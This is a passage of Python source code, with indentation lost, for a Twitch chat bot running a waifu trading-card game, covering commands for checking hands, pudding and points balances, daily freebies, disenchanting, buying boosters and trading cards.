"UPDATE users SET lastActiveTimestamp = %s, lastActiveChannel = %s WHERE id = %s",
[current_milli_time(), "$$whisper$$" if isWhisper else source, tags['user-id']])
self.do_command(command, parts[1:], target, source, tags, isWhisper=isWhisper)
elif message.startswith("!") and message.split()[0][1:].lower() in activeCommands:
self.message(source, "Bad Bot. No. (account banned from playing TCG)", isWhisper)
return
def message(self, channel, message, isWhisper=False):
logger.debug("sending message %s %s %s" % (channel, message, "Y" if isWhisper else "N"))
if isWhisper:
super().message("#jtv", "/w " + str(channel).replace("#", "") + " " + str(message))
elif not silence:
super().message(channel, message)
else:
logger.debug("Message not sent as not Whisper and Silent Mode enabled")
def do_command(self, command, args, sender, channel, tags, isWhisper=False):
logger.debug("Got command: %s with arguments %s", command, str(args))
isMarathonChannel = channel == config['marathonChannel'] and not isWhisper
if command == "as" and debugMode and sender in superadmins:
if len(args) < 2 or len(args[1]) == 0:
self.message(channel, "Usage: !as <user> <command>", isWhisper)
return
with busyLock:
with db.cursor() as cur:
cur.execute("SELECT id FROM users WHERE name = %s", [args[0]])
row = cur.fetchone()
if row is None:
self.message(channel, "User not found.")
return
userid = row[0]
self.do_command(args[1][1:].lower(), args[2:], args[0].lower(), channel,
{'display-name': args[0], 'user-id': userid, 'badges': []}, isWhisper)
return
with busyLock:
if command == config["marathonHelpCommand"] and isMarathonChannel:
self.message(channel, config["marathonHelpCommandText"], isWhisper)
return
if command == "quit" and sender in superadmins:
logger.info("Quitting from admin command.")
pool.disconnect(client=self, expected=True)
# sys.exit(0)
return
if command == "checkhand":
# print("Checking hand for " + sender)
cards = getHand(tags['user-id'])
if len(cards) == 0:
self.message(channel,
"%s, you don't have any waifus! Get your first with !freebie" % tags[
'display-name'], isWhisper=isWhisper)
return
currentData = currentCards(tags['user-id'], True)
limit = handLimit(tags['user-id'])
dropLink = "%s/hand?user=%s" % (config["siteHost"], sender)
msgArgs = {"user": tags['display-name'], "limit": limit, "curr": currentData['hand'],
"bounties": currentData['bounties'], "link": dropLink}
# verbose mode if it's a whisper or they request it
if len(args) > 0 and args[0].lower() == "verbose":
if isWhisper or followsme(tags['user-id']):
whisperChannel = "#%s" % sender
if currentData['bounties'] > 0:
self.message(whisperChannel,
"{user}, you have {curr} waifus, {bounties} bounties and {limit} total spaces. {link}".format(
**msgArgs), True)
else:
self.message(whisperChannel,
"{user}, you have {curr} waifus and {limit} total spaces. {link}".format(
**msgArgs), True)
messages = ["Your current hand is: "]
for row in cards:
row['amount'] = "(x%d)" % row['amount'] if row['amount'] > 1 else ""
waifumsg = getWaifuRepresentationString(row['id'], cardrarity=row[
'rarity']) + ' from {series} - {image}{amount}; '.format(**row)
if len(messages[-1]) + len(waifumsg) > 400:
messages.append(waifumsg)
else:
messages[-1] += waifumsg
for message in messages:
self.message(whisperChannel, message, True)
elif not isWhisper:
self.message(channel,
"%s, to use verbose checkhand, follow the bot! Follow it and try again." %
tags['display-name'])
else:
if currentData['bounties'] > 0:
self.message(channel,
"{user}, you have {curr} waifus, {bounties} bounties and {limit} total spaces. {link}".format(
**msgArgs), isWhisper)
else:
self.message(channel,
"{user}, you have {curr} waifus and {limit} total spaces. {link}".format(
**msgArgs), isWhisper)
return
if command == "points":
with db.cursor() as cur:
cur.execute("SELECT points FROM users WHERE id = %s", [tags['user-id']])
points = cur.fetchone()[0]
pudding = sum(getPuddingBalance(tags['user-id']))
self.message(channel, "%s, you have %d points and %d pudding!" % (tags['display-name'], points, pudding), isWhisper)
return
if command == "pudding":
subcmd = "" if len(args) < 1 else args[0].lower()
if subcmd == "booster":
if len(args) < 2:
self.message(channel, "Usage: !pudding booster <name>", isWhisper)
return
# check that the pack is actually buyable
truename = boostername = args[1].lower()
mega = False
if boostername.startswith("mega"):
truename = boostername[4:]
mega = True
with db.cursor() as cur:
cur.execute("SELECT name, cost, canMega FROM boosters WHERE name = %s AND buyable = 1", [truename])
booster = cur.fetchone()
if booster is None or (mega and booster[2] == 0):
self.message(channel, "Invalid booster specified.", isWhisper)
return
# can they actually open it?
cur.execute("SELECT COUNT(*) FROM boosters_opened WHERE userid = %s AND status = 'open'",
[tags['user-id']])
boosteropen = cur.fetchone()[0] or 0
if boosteropen > 0:
self.message(channel,
"%s, you have an open booster already! !booster show to check it." %
tags['display-name'], isWhisper)
return
cost = math.ceil(int(booster[1])/int(config["puddingExchangeRate"]))*(5 if mega else 1)
if not hasPudding(tags['user-id'], cost):
self.message(channel, "%s, you can't afford a %s booster. They cost %d pudding." % (tags['display-name'], boostername, cost), isWhisper)
return
takePudding(tags['user-id'], cost)
try:
openBooster(self, tags['user-id'], sender, tags['display-name'], channel, isWhisper, truename, False, mega)
if checkHandUpgrade(tags['user-id']):
messageForHandUpgrade(tags['user-id'], tags['display-name'], self, channel, isWhisper)
self.message(channel, "%s, you open a %s booster for %d pudding: %s/booster?user=%s" % (tags['display-name'], boostername, cost, config["siteHost"], sender), isWhisper)
except InvalidBoosterException:
discordbody = {
"username": "WTCG Admin",
"content" : "Booster type %s is broken, please fix it." % booster[0]
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel,
"There was an error processing your booster, please try again later.",
isWhisper)
return
elif subcmd == "list":
with db.cursor() as cur:
cur.execute("SELECT name, cost FROM boosters WHERE listed = 1 AND buyable = 1 ORDER BY sortIndex ASC")
boosters = cur.fetchall()
boosterInfo = ", ".join("%s / %d pudding" % (row[0], math.ceil(int(row[1])/int(config["puddingExchangeRate"]))) for row in boosters)
self.message(channel, "Current buyable packs: %s. !pudding booster <name> to buy a booster with pudding." % boosterInfo, isWhisper)
else:
# base: show pudding balance broken down
pudding = getPuddingBalance(tags['user-id'])
if sum(pudding) == 0:
self.message(channel, "%s, you don't currently have any pudding. You can earn some by participating in bets or completing sets." % tags['display-name'], isWhisper)
else:
msgArgs = (tags['display-name'], sum(pudding), pudding[0], pudding[1], pudding[2])
self.message(channel, "%s, you have %d total pudding: %d earned this month, %d earned last month, %d expiring soon. !pudding list to see what boosters you can buy, !pudding booster <name> to buy a booster with pudding." % msgArgs, isWhisper)
return
if command == "freewaifu" or command == "freebie":
# print("Checking free waifu egliability for " + str(sender))
with db.cursor() as cur:
cur.execute("SELECT lastFree, rewardSeqSeed, rewardSeqIndex FROM users WHERE id = %s", [tags['user-id']])
res = cur.fetchone()
nextFree = 79200000 + int(res[0])
if nextFree > current_milli_time():
a = datetime.timedelta(milliseconds=int(nextFree - current_milli_time()), microseconds=0)
datestring = "{0}".format(a).split(".")[0]
self.message(channel,
str(tags[
'display-name']) + ", you need to wait {0} for your next free drop!".format(
datestring), isWhisper=isWhisper)
return
cur.execute("SELECT COUNT(*) FROM boosters_opened WHERE userid = %s AND status = 'open'", [tags['user-id']])
hasPack = cur.fetchone()[0] > 0
spaceInHand = currentCards(tags['user-id']) < handLimit(tags['user-id'])
freeData = getRewardsMetadata()
seed = res[1]
index = res[2]
if seed is None or index >= freeData[0]:
seed = generateRewardsSeed(*freeData)
index = 0
# retrieve their reward for this time
generator = random.Random(seed)
seq = [x for x in range(freeData[0])]
generator.shuffle(seq)
rewardNum = seq[index]
if rewardNum >= freeData[1]:
# not good reward
lookup = [0, rewardNum - freeData[1]]
else:
# good
lookup = [1, rewardNum]
cur.execute("SELECT points, waifuid, waifu_rarity, boostername FROM free_rewards WHERE `is_good` = %s AND `index` = %s", lookup)
rewardInfo = cur.fetchone()
if rewardInfo is None:
discordbody = {
"username": "WTCG Admin",
"content" : "The free reward database is misconfigured, please fix it."
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel, "Could not retrieve your free reward, try again later.", isWhisper)
return
# only one of the latter three rewards is allowed to be filled in, and there needs to be at least one reward.
cardRewardCount = sum([(1 if rewardInfo[n] is not None else 0) for n in range(1, 4)])
ovrRewardCount = sum([(1 if rewardInfo[n] is not None else 0) for n in range(4)])
if cardRewardCount > 1 or ovrRewardCount == 0:
discordbody = {
"username": "WTCG Admin",
"content" : "The free reward database is misconfigured, please fix it."
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel, "Could not retrieve your free reward, try again later.", isWhisper)
return
# can they take the reward at the current time?
if (rewardInfo[1] is not None or rewardInfo[2] is not None) and hasPack and not spaceInHand:
self.message(channel, "%s, your hand is full and you have a booster open!" % tags['display-name'], isWhisper)
return
# if we made it this far they can receive it. process it
if rewardInfo[0] is not None:
addPoints(tags['user-id'], rewardInfo[0])
if cardRewardCount == 0:
self.message(channel, "%s, you got your daily free reward: %d points!" % (tags['display-name'], rewardInfo[0]), isWhisper)
pointsPrefix = ("%d points and " % rewardInfo[0]) if rewardInfo[0] is not None else ""
if rewardInfo[1] is not None or rewardInfo[2] is not None:
if rewardInfo[1] is not None:
wid = rewardInfo[1]
else:
wid = dropCard(rarity=rewardInfo[2], bannedCards=getUniqueCards(tags['user-id']))
row = getWaifuById(wid)
recordPullMetrics(row['id'])
logDrop(str(tags['user-id']), row['id'], row['base_rarity'], "freebie", channel, isWhisper)
if row['base_rarity'] >= int(config["drawAlertMinimumRarity"]):
threading.Thread(target=sendDrawAlert, args=(channel, row, str(tags["display-name"]))).start()
if not spaceInHand:
cur.execute(
"INSERT INTO boosters_opened (userid, boostername, paid, created, status) VALUES(%s, 'freebie', 0, %s, 'open')",
[tags['user-id'], current_milli_time()])
boosterid = cur.lastrowid
cur.execute("INSERT INTO boosters_cards (boosterid, waifuid) VALUES(%s, %s)",
[boosterid, row['id']])
else:
giveCard(tags['user-id'], row['id'], row['base_rarity'])
attemptPromotions(row['id'])
droplink = config["siteHost"] + "/booster?user=" + sender
msgArgs = {"username": tags['display-name'], "id": row['id'],
"rarity": config["rarity%dName" % row['base_rarity']],
"name": row['name'], "series": row['series'],
"link": row['image'] if spaceInHand else "",
"pack": " ( %s )" % droplink if not spaceInHand else "",
"points": pointsPrefix}
self.message(channel, "{username}, you got your daily free reward: {points}[{id}][{rarity}] {name} from {series} - {link}{pack}".format(**msgArgs), isWhisper)
if rewardInfo[3] is not None:
if hasPack:
# send the pack to freepacks
giveFreeBooster(tags['user-id'], rewardInfo[3])
self.message(channel, "%s, you got your daily free reward: %sa %s booster (sent to !freepacks)" % (tags['display-name'], pointsPrefix, rewardInfo[3]), isWhisper)
else:
try:
packid = openBooster(self, tags['user-id'], sender, tags['display-name'], channel, isWhisper, rewardInfo[3], False)
if checkHandUpgrade(tags['user-id']):
messageForHandUpgrade(tags['user-id'], tags['display-name'], self, channel, isWhisper)
self.message(channel, "%s, you got your daily free reward: %sa %s booster - %s/booster?user=%s" % (tags['display-name'], pointsPrefix, rewardInfo[3], config['siteHost'], sender), isWhisper)
except InvalidBoosterException:
discordbody = {
"username": "WTCG Admin",
"content" : "The free reward database is misconfigured, please fix it."
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel, "Could not retrieve your free reward, try again later.", isWhisper)
return
cur.execute("UPDATE users SET lastFree = %s, rewardSeqSeed = %s, rewardSeqIndex = %s WHERE id = %s", [current_milli_time(), seed, index + 1, tags['user-id']])
return
if command == "disenchant" or command == "de":
if len(args) == 0 or (len(args) == 1 and len(args[0]) == 0):
self.message(channel, "Usage: !disenchant <list of IDs>", isWhisper=isWhisper)
return
# check for confirmation
hasConfirmed = False
if args[-1].lower() == "yes":
hasConfirmed = True
args = args[:-1]
disenchants = []
dontHave = []
hand = getHand(tags['user-id'])
disenchantingSpecial = False
godRarity = int(config["numNormalRarities"]) - 1
for arg in args:
# handle disenchanting
try:
deTarget = parseHandCardSpecifier(hand, arg)
if deTarget in disenchants:
self.message(channel, "You can't disenchant the same waifu twice at once!", isWhisper)
return
if deTarget['rarity'] >= int(config["numNormalRarities"]) and not hasConfirmed:
self.message(channel,
"%s, you are trying to disenchant one or more special waifus! Special waifus do not take up any hand space and disenchant for 0 points. If you are sure you want to do this, append \" yes\" to the end of your command." %
tags['display-name'], isWhisper)
return
if deTarget['rarity'] >= int(
config["disenchantRequireConfirmationRarity"]) and not hasConfirmed:
confirmRarityName = config["rarity%sName" % config["disenchantRequireConfirmationRarity"]]
self.message(channel,
"%s, you are trying to disenchant one or more waifus of %s rarity or higher! If you are sure you want to do this, append \" yes\" to the end of your command." % (
tags['display-name'], confirmRarityName), isWhisper)
return
if deTarget['rarity'] != deTarget['base_rarity'] and not hasConfirmed:
self.message(channel,
"%s, you are trying to disenchant one or more promoted waifus! If you are sure you want to do this, append \" yes\" to the end of your command." %
tags['display-name'], isWhisper)
return
disenchants.append(deTarget)
except CardNotInHandException:
dontHave.append(arg)
except AmbiguousRarityException:
self.message(channel,
"You have more than one rarity of waifu %s in your hand. Please specify a rarity as well by appending a hyphen and then the rarity e.g. !disenchant %s-god" % (
arg, arg), isWhisper)
return
except ValueError:
self.message(channel, "Could not decipher one or more of the waifu IDs you provided.",
isWhisper)
return
if len(dontHave) > 0:
if len(dontHave) == 1:
self.message(channel, "You don't own waifu %s." % dontHave[0], isWhisper)
else:
self.message(channel,
"You don't own the following waifus: %s" % ", ".join([id for id in dontHave]),
isWhisper)
return
# handle disenchants appropriately
pointsGain = 0
ordersFilled = 0
checkPromos = []
for row in disenchants:
if row['id'] not in checkPromos:
checkPromos.append(row['id'])
takeCard(tags['user-id'], row['id'], row['rarity'])
if row['base_rarity'] >= int(config["numNormalRarities"]):
disenchantingSpecial = True
baseValue = int(config["rarity" + str(row['rarity']) + "Value"])
profit = attemptBountyFill(self, row['id'])
pointsGain += baseValue + profit
if profit > 0:
ordersFilled += 1
elif row['rarity'] >= int(config["disenchantAlertMinimumRarity"]):
# valuable waifu disenchanted
waifuData = getWaifuById(row['id'])
waifuData['base_rarity'] = row['rarity'] # cheat to make it show any promoted rarity override
threading.Thread(target=sendDisenchantAlert,
args=(channel, waifuData, tags["display-name"])).start()
if row['rarity'] == godRarity:
# check image change
with db.cursor() as cur:
cur.execute("UPDATE godimage_requests SET state='cancelled' WHERE requesterid = %s AND waifuid = %s AND state = 'pending'", [tags['user-id'], row['id']])
if cur.rowcount > 0:
# request was cancelled
waifuData = getWaifuById(row['id'])
self.message("#%s" % sender, "Your image change request for [%d] %s was cancelled since you disenchanted it." % (row['id'], waifuData['name']), True)
addPoints(tags['user-id'], pointsGain)
attemptPromotions(*checkPromos)
if disenchantingSpecial:
checkFavouriteValidity(tags['user-id'])
if len(disenchants) == 1:
buytext = " (bounty filled)" if ordersFilled > 0 else ""
self.message(channel, "Successfully disenchanted waifu %d%s. %s gained %d points" % (
disenchants[0]['id'], buytext, str(tags['display-name']), pointsGain), isWhisper=isWhisper)
else:
buytext = " (%d bounties filled)" % ordersFilled if ordersFilled > 0 else ""
self.message(channel,
"Successfully disenchanted %d waifus%s. Added %d points to %s's account" % (
len(disenchants), buytext, pointsGain, str(tags['display-name'])),
isWhisper=isWhisper)
return
if command == "giveme":
self.message(channel, "No.", isWhisper=isWhisper)
return
if command == "buy":
if len(args) != 1:
if len(args) > 0 and args[0].lower() == "booster":
self.message(channel, "%s, did you mean !booster buy?" % tags['display-name'], isWhisper)
else:
self.message(channel, "Usage: !buy <rarity> (So !buy uncommon for an uncommon)",
isWhisper=isWhisper)
return
if currentCards(tags['user-id']) >= handLimit(tags['user-id']):
self.message(channel,
"{sender}, you have too many cards to buy one! !disenchant some or upgrade your hand!".format(
sender=str(tags['display-name'])), isWhisper=isWhisper)
return
try:
rarity = parseRarity(args[0])
except Exception:
self.message(channel, "Unknown rarity. Usage: !buy <rarity> (So !buy uncommon for an uncommon)",
isWhisper=isWhisper)
return
if rarity >= int(config["numNormalRarities"]) or int(config["rarity" + str(rarity) + "Max"]) == 1:
self.message(channel, "You can't buy that rarity of waifu.", isWhisper=isWhisper)
return
price = int(config["rarity" + str(rarity) + "Value"]) * 5
if not hasPoints(tags['user-id'], price):
self.message(channel, "You do not have enough points to buy a " + str(
config["rarity" + str(rarity) + "Name"]) + " waifu. You need " + str(price) + " points.",
isWhisper=isWhisper)
return
chosenWaifu = dropCard(rarity=rarity, allowDowngrades=False,
bannedCards=getUniqueCards(tags['user-id']))
if chosenWaifu is not None:
addPoints(tags['user-id'], 0 - price)
row = getWaifuById(chosenWaifu)
self.message(channel, str(
tags[
'display-name']) + ', you bought a new Waifu for {price} points: [{id}][{rarity}] {name} from {series} - {link}'.format(
id=str(row['id']), rarity=config["rarity" + str(row['base_rarity']) + "Name"], name=row['name'],
series=row['series'],
link=row['image'], price=str(price)), isWhisper=isWhisper)
recordPullMetrics(row['id'])
giveCard(tags['user-id'], row['id'], row['base_rarity'])
logDrop(str(tags['user-id']), row['id'], rarity, "buy", channel, isWhisper)
if row['base_rarity'] >= int(config["drawAlertMinimumRarity"]):
threading.Thread(target=sendDrawAlert, args=(channel, row, str(tags["display-name"]))).start()
attemptPromotions(row['id'])
return
else:
self.message(channel, "You can't buy a %s waifu right now. Try again later." % config[
"rarity" + str(rarity) + "Name"], isWhisper)
return
if command == "booster":
if len(args) < 1:
self.message(channel,
"Usage: !booster list OR !booster buy <%s> OR !booster select <take/disenchant> (for each waifu) OR !booster show" % visiblepacks,
isWhisper=isWhisper)
return
# check for confirmation
hasConfirmed = False
if args[-1].lower() == "yes":
hasConfirmed = True
args = args[:-1]
cmd = args[0].lower()
# even more shorthand shortcut for disenchant all
if cmd == "trash":
cmd = "select"
args = ["select", "deall"]
cur = db.cursor()
cur.execute("SELECT id FROM boosters_opened WHERE userid = %s AND status = 'open'", [tags['user-id']])
boosterinfo = cur.fetchone()
if (cmd == "show" or cmd == "select") and boosterinfo is None:
self.message(channel, tags[
'display-name'] + ", you do not have an open booster. Buy one using !booster buy <%s>" % visiblepacks,
isWhisper=isWhisper)
cur.close()
return
if cmd == "show":
if len(args) > 1 and args[1].lower() == "verbose":
# TODO
pass
else:
droplink = config["siteHost"] + "/booster?user=" + sender
self.message(channel, "{user}, your current open booster pack: {droplink}".format(
user=tags['display-name'], droplink=droplink), isWhisper=isWhisper)
cur.close()
return
if cmd == "select":
cur.execute("SELECT waifuid FROM boosters_cards WHERE boosterid = %s", [boosterinfo[0]])
cardrows = cur.fetchall()
cards = [row[0] for row in cardrows]
# check for shorthand syntax
if len(args) == 2:
if args[1].lower() == 'deall' or args[1].lower() == 'disenchantall':
selectArgs = ["disenchant"] * len(cards)
else:
selectArgs = []
for letter in args[1].lower():
if letter != 'd' and letter != 'k':
self.message(channel,
"When using shorthand booster syntax, please only use the letters d and k.",
isWhisper=isWhisper)
cur.close()
return
elif letter == 'd':
selectArgs.append("disenchant")
else:
selectArgs.append("keep")
else:
selectArgs = args[1:]
if len(selectArgs) != len(cards):
self.message(channel, "You did not specify the correct amount of keep/disenchant.",
isWhisper=isWhisper)
cur.close()
return
for arg in selectArgs:
if not (arg.lower() == "keep" or arg.lower() == "disenchant"):
self.message(channel,
"Sorry, but " + arg.lower() + " is not a valid option. Use keep or disenchant",
isWhisper=isWhisper)
cur.close()
return
# check card info for rarities etc
keepCards = []
deCards = []
keepingCount = 0
for i in range(len(cards)):
waifu = getWaifuById(cards[i])
if selectArgs[i].lower() == "keep":
keepCards.append(waifu)
if waifu['base_rarity'] < int(config["numNormalRarities"]):
keepingCount += 1
else:
# disenchant
if waifu['base_rarity'] >= int(
config["disenchantRequireConfirmationRarity"]) and not hasConfirmed:
confirmRarityName = config[
"rarity%sName" % config["disenchantRequireConfirmationRarity"]]
self.message(channel,
"%s, you are trying to disenchant one or more waifus of %s rarity or higher! If you are sure you want to do this, append \" yes\" to the end of your command." % (
tags['display-name'], confirmRarityName), isWhisper)
return
deCards.append(waifu)
if keepingCount + currentCards(tags['user-id']) > handLimit(tags['user-id']) and keepingCount != 0:
self.message(channel, "You can't keep that many waifus! !disenchant some!", isWhisper=isWhisper)
cur.close()
return
trash = (keepingCount == 0)
# if we made it through the whole pack without tripping confirmation, we can actually do it now
for waifu in keepCards:
giveCard(tags['user-id'], waifu['id'], waifu['base_rarity'])
gottenpoints = 0
ordersFilled = 0
for waifu in deCards:
baseValue = int(config["rarity" + str(waifu['base_rarity']) + "Value"])
profit = attemptBountyFill(self, waifu['id'])
gottenpoints += baseValue + profit
if profit > 0:
ordersFilled += 1
elif waifu['base_rarity'] >= int(config["disenchantAlertMinimumRarity"]):
# valuable waifu being disenchanted
threading.Thread(target=sendDisenchantAlert,
args=(channel, waifu, str(tags["display-name"]))).start()
addPoints(tags['user-id'], gottenpoints)
attemptPromotions(*cards)
# compile the message to be sent in chat
response = "You %s your booster pack%s" % (("trash", "") if trash else ("take"," and: "))
if len(keepCards) > 0:
response += " keep " + ', '.join(str(x['id']) for x in keepCards) + ";"
if len(deCards) > 0 and not trash:
response += " disenchant the rest"
if ordersFilled > 0:
response += " (filling %d bounties);" % ordersFilled
elif len(deCards) > 0:
response += ";"
self.message(channel, response + ((" netting " + str(gottenpoints) + " points.") if gottenpoints>0 else ""),
isWhisper=isWhisper)
cur.execute("UPDATE boosters_opened SET status = 'closed', updated = %s WHERE id = %s",
[current_milli_time(), boosterinfo[0]])
cur.close()
return
if cmd == "list":
with db.cursor() as cur:
cur.execute("SELECT name, cost FROM boosters WHERE listed = 1 AND buyable = 1 ORDER BY sortIndex ASC")
boosters = cur.fetchall()
boosterInfo = ", ".join("%s / %d points" % (row[0], row[1]) for row in boosters)
self.message(channel, "Current buyable packs: %s. !booster buy <name> to buy a booster with points." % boosterInfo, isWhisper)
return
if cmd == "buy":
if boosterinfo is not None:
self.message(channel,
"You already have an open booster. Close it first!",
isWhisper=isWhisper)
cur.close()
return
if len(args) < 2:
self.message(channel, "Usage: !booster buy <%s>" % visiblepacks, isWhisper=isWhisper)
cur.close()
return
truepackname = packname = args[1].lower()
mega = False
if packname.startswith("mega"):
truepackname = packname[4:]
mega = True
try:
openBooster(self, tags['user-id'], sender, tags['display-name'], channel, isWhisper, truepackname, True, mega)
if checkHandUpgrade(tags['user-id']):
messageForHandUpgrade(tags['user-id'], tags['display-name'], self, channel, isWhisper)
droplink = config["siteHost"] + "/booster?user=" + sender
self.message(channel, "{user}, you open a {type} booster: {droplink}".format(
user=tags['display-name'], type=packname, droplink=droplink), isWhisper=isWhisper)
except InvalidBoosterException:
self.message(channel, "Invalid booster type. Packs available right now: %s." % visiblepacks,
isWhisper=isWhisper)
except CantAffordBoosterException as exc:
self.message(channel,
"{user}, you don't have enough points for a {name} pack. You need {points}.".format(
user=tags['display-name'], name=packname, points=exc.cost),
isWhisper=isWhisper)
cur.close()
return
if command == "trade":
ourid = int(tags['user-id'])
with db.cursor() as cur:
# expire old trades
currTime = current_milli_time()
cur.execute(
"UPDATE trades SET status = 'expired', updated = %s WHERE status = 'open' AND created <= %s",
[currTime, currTime - 86400000])
if len(args) < 2:
self.message(channel,
"Usage: !trade <check/accept/decline> <user> OR !trade <user> <have> <want>",
isWhisper=isWhisper)
return
subarg = args[0].lower()
if subarg in ["check", "accept", "decline"]:
otherparty = args[1].lower()
cur.execute("SELECT id FROM users WHERE name = %s", [otherparty])
otheridrow = cur.fetchone()
if otheridrow is None:
self.message(channel, "I don't recognize that username.", isWhisper=isWhisper)
return
otherid = int(otheridrow[0])
# look for trade row
cur.execute(
"SELECT id, want, have, points, payup, want_rarity, have_rarity FROM trades WHERE fromid = %s AND toid = %s AND status = 'open' LIMIT 1",
[otherid, ourid])
trade = cur.fetchone()
if trade is None:
self.message(channel,
otherparty + " did not send you a trade. Send one with !trade " + otherparty + " <have> <want>",
isWhisper=isWhisper)
return
want = trade[1]
have = trade[2]
tradepoints = trade[3]
payup = trade[4]
want_rarity = trade[5]
have_rarity = trade[6]
if subarg == "check":
wantdata = getWaifuById(want)
havedata = getWaifuById(have)
haveStr = getWaifuRepresentationString(have, havedata['base_rarity'], have_rarity,
havedata['name'])
wantStr = getWaifuRepresentationString(want, wantdata['base_rarity'], want_rarity,
wantdata['name'])
payer = "they will pay you" if otherid == payup else "you will pay them"
if tradepoints > 0:
self.message(channel,
"{other} wants to trade their {have} for your {want} and {payer} {points} points. Accept it with !trade accept {other}".format(
other=otherparty, have=haveStr, want=wantStr, payer=payer,
points=tradepoints), isWhisper=isWhisper)
else:
self.message(channel,
"{other} wants to trade their {have} for your {want}. Accept it with !trade accept {other}".format(
other=otherparty, have=haveStr, want=wantStr, payer=payer),
isWhisper=isWhisper)
return
elif subarg == "decline":
cur.execute("UPDATE trades SET status = 'declined', updated = %s WHERE id = %s",
[current_milli_time(), trade[0]])
self.message(channel, "Trade declined.", isWhisper=isWhisper)
return
else:
# accept
# check that cards are still in place
ourhand = getHand(ourid)
otherhand = getHand(otherid)
try:
parseHandCardSpecifier(ourhand, "%d-%d" % (want, want_rarity))
except CardRarityNotInHandException:
self.message(channel,
"%s, the rarity of waifu %d in your hand has changed! Trade cancelled." % (
tags['display-name'], want), isWhisper)
cur.execute("UPDATE trades SET status = 'invalid', updated = %s WHERE id = %s",
[current_milli_time(), trade[0]])
return
except CardNotInHandException:
self.message(channel, "%s, you no longer own waifu %d! Trade cancelled." % (
tags['display-name'], want), isWhisper)
cur.execute("UPDATE trades SET status = 'invalid', updated = %s WHERE id = %s",
[current_milli_time(), trade[0]])
return
try:
parseHandCardSpecifier(otherhand, "%d-%d" % (have, have_rarity))
except CardRarityNotInHandException:
self.message(channel,
"%s, the rarity of %s's copy of waifu %d has changed! Trade cancelled." % (
tags['display-name'], otherparty, have), isWhisper)
cur.execute("UPDATE trades SET status = 'invalid', updated = %s WHERE id = %s",
[current_milli_time(), trade[0]])
return
except CardNotInHandException:
self.message(channel, "%s, %s no longer owns waifu %d! Trade cancelled." % (
tags['display-name'], otherparty, have), isWhisper)
cur.execute("UPDATE trades SET status = 'invalid', updated = %s WHERE id = %s",
[current_milli_time(), trade[0]])
return
cost = int(config["tradingFee"])
nonpayer = ourid if payup == otherid else otherid
if not hasPoints(payup, cost + tradepoints):
self.message(channel, "Sorry, but %s cannot cover the %s trading fee." % (
"you" if payup == ourid else otherparty, "fair" if tradepoints > 0 else "base"),
isWhisper=isWhisper)
return
if not hasPoints(nonpayer, cost - tradepoints):
self.message(channel, "Sorry, but %s cannot cover the base trading fee." % (
"you" if nonpayer == ourid else otherparty), isWhisper=isWhisper)
return
# move the cards
# should preserve God image changes through the trade
godRarity = int(config["numNormalRarities"]) - 1
if want_rarity == godRarity:
cur.execute("UPDATE has_waifu SET userid = %s WHERE userid = %s AND waifuid = %s AND rarity = %s", [otherid, ourid, want, want_rarity])
cur.execute("UPDATE godimage_requests SET state = 'cancelled' WHERE requesterid = %s AND waifuid = %s AND state = 'pending'", [ourid, want])
if cur.rowcount > 0:
# a request was actually cancelled
wantdata = getWaifuById(want)
self.message("#%s" % sender, "Your image change request for [%d] %s was cancelled since you traded it away." % (want, wantdata['name']), True)
else:
takeCard(ourid, want, want_rarity)
giveCard(otherid, want, want_rarity)
if have_rarity == godRarity:
cur.execute("UPDATE has_waifu SET userid = %s WHERE userid = %s AND waifuid = %s AND rarity = %s", [ourid, otherid, have, have_rarity])
cur.execute("UPDATE godimage_requests SET state = 'cancelled' WHERE requesterid = %s AND waifuid = %s AND state = 'pending'", [otherid, have])
if cur.rowcount > 0:
# a request was actually cancelled
havedata = getWaifuById(have)
self.message("#%s" % otherparty, "Your image change request for [%d] %s was cancelled since you traded it away." % (have, havedata['name']), True)
else:
takeCard(otherid, have, have_rarity)
giveCard(ourid, have, have_rarity)
attemptPromotions(want, have)
if want_rarity >= int(config["numNormalRarities"]):
checkFavouriteValidity(ourid)
if have_rarity >= int(config["numNormalRarities"]):
checkFavouriteValidity(otherid)
# points
addPoints(payup, -(tradepoints + cost))
addPoints(nonpayer, tradepoints - cost)
# done
cur.execute("UPDATE trades SET status = 'accepted', updated = %s WHERE id = %s",
[current_milli_time(), trade[0]])
self.message(channel, "Trade executed!", isWhisper=isWhisper)
return
if len(args) < 3:
self.message(channel,
"Usage: !trade <accept/decline> <user> OR !trade <user> <have> <want>",
isWhisper=isWhisper)
return
other = args[0]
cur.execute("SELECT id FROM users WHERE name = %s", [other])
otheridrow = cur.fetchone()
if otheridrow is None:
self.message(channel, "I don't recognize that username.", isWhisper=isWhisper)
return
otherid = int(otheridrow[0])
ourhand = getHand(ourid)
otherhand = getHand(otherid)
try:
have = parseHandCardSpecifier(ourhand, args[1])
except CardRarityNotInHandException:
self.message(channel, "%s, you don't own that waifu at that rarity!" % tags['display-name'],
isWhisper)
return
except CardNotInHandException:
self.message(channel, "%s, you don't own that waifu!" % tags['display-name'], isWhisper)
return
except AmbiguousRarityException:
self.message(channel,
"%s, you own more than one rarity of waifu %s! Please specify a rarity as well by appending a hyphen and then the rarity, e.g. %s-god" % (
tags['display-name'], args[1], args[1]), isWhisper)
return
except ValueError:
self.message(channel, "Only whole numbers/IDs + rarities please.", isWhisper)
return
try:
want = parseHandCardSpecifier(otherhand, args[2])
except CardRarityNotInHandException:
self.message(channel,
"%s, %s doesn't own that waifu at that rarity!" % (tags['display-name'], other),
isWhisper)
return
except CardNotInHandException:
self.message(channel, "%s, %s doesn't own that waifu!" % (tags['display-name'], other),
isWhisper)
return
except AmbiguousRarityException:
self.message(channel,
"%s, %s owns more than one rarity of waifu %s! Please specify a rarity as well by appending a hyphen and then the rarity, e.g. %s-god" % (
tags['display-name'], other, args[2], args[2]), isWhisper)
return
except ValueError:
self.message(channel, "Only whole numbers/IDs + rarities please.", isWhisper)
return
# actual specials can't be traded
firstSpecialRarity = int(config["numNormalRarities"])
if have["rarity"] == firstSpecialRarity or want["rarity"] == firstSpecialRarity:
self.message(channel, "Sorry, cards of that rarity cannot be traded.", isWhisper)
return
payup = ourid
canTradeDirectly = (want["rarity"] == have["rarity"]) or (
want["rarity"] >= firstSpecialRarity and have["rarity"] >= firstSpecialRarity)
points = 0
if not canTradeDirectly:
